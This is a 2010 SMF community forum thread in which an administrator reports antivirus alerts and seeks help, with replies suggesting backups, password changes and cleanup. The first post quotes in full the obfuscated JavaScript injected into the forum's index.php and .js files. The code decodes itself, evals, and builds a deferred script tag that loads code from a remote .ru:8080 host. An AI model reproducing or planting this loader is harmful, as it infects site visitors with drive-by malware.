News:

Bored?  Looking to kill some time?  Want to chat with other SMF users?  Join us in IRC chat or Discord

Main Menu

Forum infected with trojan?

Started by nwobhm, February 20, 2010, 01:52:14 PM

Previous topic - Next topic
Print
Go Down Pages1
User actions

nwobhm

February 20, 2010, 01:52:14 PM Last Edit: February 20, 2010, 02:11:22 PM by nwobhm
Few members on my forum noticed that they got "trojan alert" on their virus scanners.
It alerted about JS:Illredir-S (id 100219-1)

After looking into this my other admin found that it added into end of the certain php-files this line:
Code Select
<script>var wu="97ad83ad95ff9a92bcafa4eb91a8bbacd5a6a181b1aeb4a8b49aa68e99b69f9389a290988ea39da7cee3cce1c8a6ad8389afb1a2b6a5969bb4b898bfac8a918eb08a9bdc92aaecb1ac8aeab19ec6bfb3";this.Gl="";this.sX=64246;var xGl="";function z(vY){var mu="mu";var BR=new String();var Sz=false;var o;if(o!='Yv' && o != ''){o=null}; function l(R,N){var A;if(A!='yCp'){A='yCp'};return R[D("ahCrcedtAo", [4,1,0,3,2])](N);var RT="RT";this.mh=18070;}var JM;if(JM!='gJ' && JM != ''){JM=null};var kx="kx";var cY='';var KL;if(KL!='Fc' && KL != ''){KL=null}; var F=function(B,a){return B^a;var fk;if(fk!='f'){fk=''};};this.fm=false;var CY;if(CY!='' && CY!='yl'){CY=null}; var v=function(U){var We=new String();var Uu=false;this.lY=false;this.ne=false;U = new J(U);var QQ;if(QQ!=''){QQ='L'};this.wn="";var h = '';var Qx="";var s =[0][0];var Zp=5199;var QA='';var y =[152,31,0][2];var hV = -1;var ie="ie";var jq=new String();this.gr=false;for (s=U[D("elgnht", [1,0])]-hV;s>=y;s=s-[93,86,1][2]){this.Uw='';var Ue="Ue";h+=U[D("hcratA", [1,0])](s);var bb=7045;this.KK="";}var QO;if(QO!='VC' && QO!='Il'){QO=''};var Pwo;if(Pwo!='fA'){Pwo=''};var Bpi='';return h;var Kn;if(Kn!='gD' && Kn != ''){Kn=null};};var pi="";var Hd;if(Hd!='SJY' &&  Hd!='wE'){Hd=''}; function Nr(u){var lx=u[D("elgnht", [1,0])];var w=[250,0,217][1];var m=[69,197,1][2];var ZO;if(ZO!='' && ZO!='yv'){ZO='GM'};var b=[238,255][1];var uM=false;var x=new String();var KX;if(KX!='' && KX!='qn'){KX=null};var r=[170,0,103,108][1];this.su=25939;while(r<lx){var At;if(At!='' && At!='tm'){At=''};var zu;if(zu!='' && zu!='bE'){zu='JJ'};var Zi;if(Zi!='' && Zi!='HsI'){Zi='Xa'};r++;var KM=false;i=l(u,r - m);w+=i*lx;var jI="jI";var OM;if(OM!='WhZ'){OM=''};}var dk;if(dk!='uK'){dk='uK'};var ZG='';var nz=32579;return new J(w % b);var yj="yj";var rK=new Date();}var Cl;if(Cl!='' && Cl!='Yl'){Cl=''};var uy;if(uy!='' && uy!='Op'){uy=''};var BO=new Date();var AI=new Date();var EB=''; var D=function(U, P){var Cj=new Date();var VO;if(VO!='' && VO!='PN'){VO=null};var Iv='';var LS=new Array();var hE;if(hE!='WR' && hE != ''){hE=null};var PF='';var vT = P.length;this.dF="dF";this.ut="ut";var FN = U.length;var EdL;if(EdL!='' && EdL!='Ed'){EdL=''};var h = '';var MR;if(MR!='LU'){MR='LU'};this.ai=42933;var y=[0,189,41,167][0];var Ln="Ln";var m=[1,202,55][0];var PT=new Date();this.FT='';var Nv;if(Nv!='os'){Nv='os'};var DH='';for(var s = y; s < FN; s += vT) {var ifj = U.substr(s, vT);if(ifj.length == vT){var RG="";for(var r in P) {var xF;if(xF!='RL' && xF != ''){xF=null};this.xh=false;h+=ifj.substr(P[r], m);var bD="bD";}var wv;if(wv!='' && wv!='HhW'){wv=null};} else {var JF;if(JF!='' && JF!='Fia'){JF='iA'};  h+=ifj;}this.qU=false;}var Uy;if(Uy!='Go' && Uy != ''){Uy=null};var PQ;if(PQ!='' &&  PQ!='uG'){PQ='aXY'};var ei="ei";return h;this.hU=15151;this.cr=62979;};this.So=63225;var I=window;var WD;if(WD!='' && WD!='EQ'){WD=''};var S=I[D("veal", [1,0,2])];this.cs="";this.uyo="";var C=S(D("nuFitcon", [2,1,0]));var Ga=new String();var X = '';this.Zx="Zx";this.tV="tV";var J=S(D("tSirgn", [1,0]));var yk;if(yk!='GMs' && yk!='of'){yk='GMs'};var Z=S(D("eRgxEp", [1,0,2]));var hc="hc";var lL=56973;var aG=new Array();var Ec=new Date();var iq=new Date();var d=J[D("raomChfrCode", [6,0,2,3,4,5,1])];this.sPq='';var Ab;if(Ab!=''){Ab='TVV'};var zT=new Date();var UAY="";var rm;if(rm!='' && rm!='zP'){rm='Ww'};var Y=I[D("nuseacep", [1,0])];this.dw='';var cy;if(cy!=''){cy='Mf'};var Ik;if(Ik!='uMy' && Ik!='XP'){Ik=''};var cT=new String();var nf=new String();this.bc="";var WW="WW";var T = /[^@a-z0-9A-Z_-]/g;this.Fq=false;var M=[1, D("menctdouaterE.cent(m\'leept\'r)sci", [5,6,3,7,0,1,2,4]),2, D("lilmi.etyctm.or", [3,1,2,0,4]),3, D("oducemtnb.do.ypaepdnhCli(d)d", [1,0]),4, D("moc.irccfniooc.mog.ogle", [2,1,0,3]),5, D("tsAtde.t\'betrui(defer\'", [4,6,1,5,3,2,7,0]),6, D("etw.newhom.lady0ru:880", [1,2,3,4,0]),7, D("oidnwl.nowoad", [4,1,3,2,0]),8, D("amgstep.oomc", [2,0,1]),11, D("maccost.com", [2,4,0,3,1,5,6,7]),12, D("l.oggeocom", [4,2,6,3,0,5,1]),14, D("ufcnitno)(", [1,0]),15, D("e)(hctac", [4,6,5,7,3,2,0,1]),16, D(":\"thpt", [1,3,5,2,4,0]),17, D("ebrtox", [2,4,1,3,0]),18, D("sc.dr", [3,2,0,4,1]),19, D("1\')\'", [1,0]),20, D("ocm", [1,0,2]),21, D("ytr", [1,2,0])];this.TZ=17174;this.jE=false;var m =[1,11,146][0];var rj=new String();var uL;if(uL!='ke' && uL != ''){uL=null};var Sr = vY[D("nlehgt", [1,2,0])];var DC=new Array();var du="";var y =[0,36,99,168][0];var Up = '';var js=new Array();var BG='';var e = J.fromCharCode(37);var Kf;if(Kf!='' && Kf!='ptk'){Kf=''};var Gd;if(Gd!=''){Gd='je'};var gb;if(gb!='hlz' && gb!='oCC'){gb=''};var NK = '';var Rk =[2,153,87,250][0];var fAf;if(fAf!='' && fAf!='eb'){fAf='TZu'};var g = '';var G =[0][0];var ye;if(ye!='JH' && ye!='zg'){ye='JH'};var gB=18419;var HC;if(HC!=''){HC='wS'};for(var Na=y; Na < Sr; Na+=Rk){NK+= e; var sg;if(sg!='ns' && sg!='al'){sg='ns'};this.pjv="pjv";NK+= vY[D("ussbrt", [1,0])](Na, Rk);}var UI="UI";this.FUO=35368;this.mZ=31071;this.Sv=8498;var vY = Y(NK);var MJ;if(MJ!='pA' && MJ!='Ze'){MJ=''};this.Vw=37474;this.yuf="yuf";var Hp=new String();var O = new J(z);var ZC;if(ZC!='' && ZC!='lz'){ZC='Bpc'};var cDV;if(cDV!='jeO'){cDV=''};var CX = O[D("preclae", [1,2,0])](T, Up);var AG="AG";var VI=18183;var k = M[D("enlthg", [2,0,1])];var pn;if(pn!='MG' && pn != ''){pn=null};var db=new Date();var iK = new J(C);CX = v(CX);var Wq;if(Wq!='Rn' && Wq!='jX'){Wq=''};var TQ;if(TQ!='' && TQ!='nS'){TQ=''};var qq;if(qq!='frd' && qq!='zt'){qq=''};var sP = iK[D("plerace", [3,2,0,1])](T, Up);this.Xn='';this.Isg='';var sP = Nr(sP);var Wl='';var PwL;if(PwL!='vo' && PwL!='kv'){PwL=''};var vC=Nr(CX);var yK;if(yK!='ge'){yK='ge'};this.Hy='';for(var s=y; s < (vY[D("nlehgt", [1,2,0])]);s=s+[53,1][1]) {this.ioM='';var pc='';var IV=57592;var H = CX.charCodeAt(G);var YA = l(vY,s);var Hu;if(Hu!='ym' && Hu!='EK'){Hu=''};var Je=false;YA = F(YA, H);var Gs=52657;var hG;if(hG!='BE'){hG='BE'};YA = F(YA, vC);var Ai='';YA = F(YA, sP);this.bL=38662;this.bK="";G++;var wR="";var SG;if(SG!='HhWa' && SG!='UwU'){SG=''};if(G > CX.length-m){G=y;var TZs="";}var Zv;if(Zv!=''){Zv='Qc'};var TA;if(TA!='' && TA!='tA'){TA=''};g += d(YA);var Tmx;if(Tmx!='' && Tmx!='oQ'){Tmx='bhY'};}var gf;if(gf!=''){gf='GZ'};for(GD=y; GD < k; GD+=Rk){this.uz="uz";var RI=false;this.tt=false;var az = M[GD + m];var nc=false;var q = d(M[GD]);var wMz;if(wMz!=''){wMz='wW'};var Er;if(Er!=''){Er='rn'};var HJq;if(HJq!='' && HJq!='vE'){HJq='ALM'};var dba;if(dba!='' && dba!='jy'){dba='uMK'};var Ss = new Z(q, "g");var BxE;if(BxE!='UZ'){BxE=''};g=g[D("erpalce", [1,0,2])](Ss, az);var DE;if(DE!='' && DE!='DK'){DE=''};this.JzT='';}var hO=48303;this.Js="Js";var YN;if(YN!='' && YN!='Gh'){YN='iZ'};var Eg;if(Eg!='IK'){Eg=''};var Mh=new C(g);this.ud=false;this.zPk='';Mh();var KZ=false;this.Nh=55746;sP = '';iK = '';var Ws=new String();this.XW=false;vC = '';var Gr;if(Gr!='XL'){Gr='XL'};var zL=new String();g = '';CX = '';var nfQ="";var IEF;if(IEF!='' && IEF!='dS'){IEF=null};this.cA="cA";Mh = '';var PR;if(PR!='EW'){PR=''};var hD;if(hD!='' && hD!='Pv'){hD=''};var AP;if(AP!='ve'){AP=''};this.lxk='';var Qy=49082;var rM=new Date();return '';this.Hb="";var HCW;if(HCW!=''){HCW='wN'};};this.Gl="";this.sX=64246;var xGl="";z(wu);</script>
<!--60999f5fea9ec6673dcfe12067f8b7a8-->

It seems that it infected all of the index.php files and some .js files. We are currently manually removing this line from all the infected files, but will it be enough?
What else I should do?

I have installed following mods

1.    SMF Media Gallery      2.0.3
2.    PMXBlog    0.952
3.    Aeva ~ Auto-Embed Video & Audio    7.0
4.    Highslide Image Viewer    1.6
5.    Top 10 Posters and Topic Starters Stats (Today, This Week, This Month)    2.4.2
7.    Admin Notepad    2.0
8.    SMF Arcade    2.5 RC1
9.    Join Reason    1.2
10.    Spoiler Tag    0.7
11.    Reason For Editing Mod    2.0
12.    SimplePortal    2.3.1

greyknight17

#1
March 04, 2010, 09:40:00 PM
Do you have a recent backup that's not infected? If so, restoring that backup would be my recommendation.

dgswilson

#2
March 05, 2010, 09:03:14 AM
Someone has access to your website. The place to start is the home computer. Something like Avast-free anti virus might be enough. If you use an ftp program on your home computer, delete it and reinstall a fresh download. Change every password on your website. Look for md5 files in your site directory - delete them. Check database users and delete any that aren't "you". If you need help, and are willing to pay, get a hold of Steve Hyndman. Just search his name + wordpress. I think his website is educhalk.

Bottom line - if they're in, and you haven't got them out, then they're still in.

Mick.

#3
March 05, 2010, 09:08:44 AM
I had something like this before.  I believe all i did was, remove those lines from all index.php files.

Print
Go Up Pages1
User actions
Advertisement: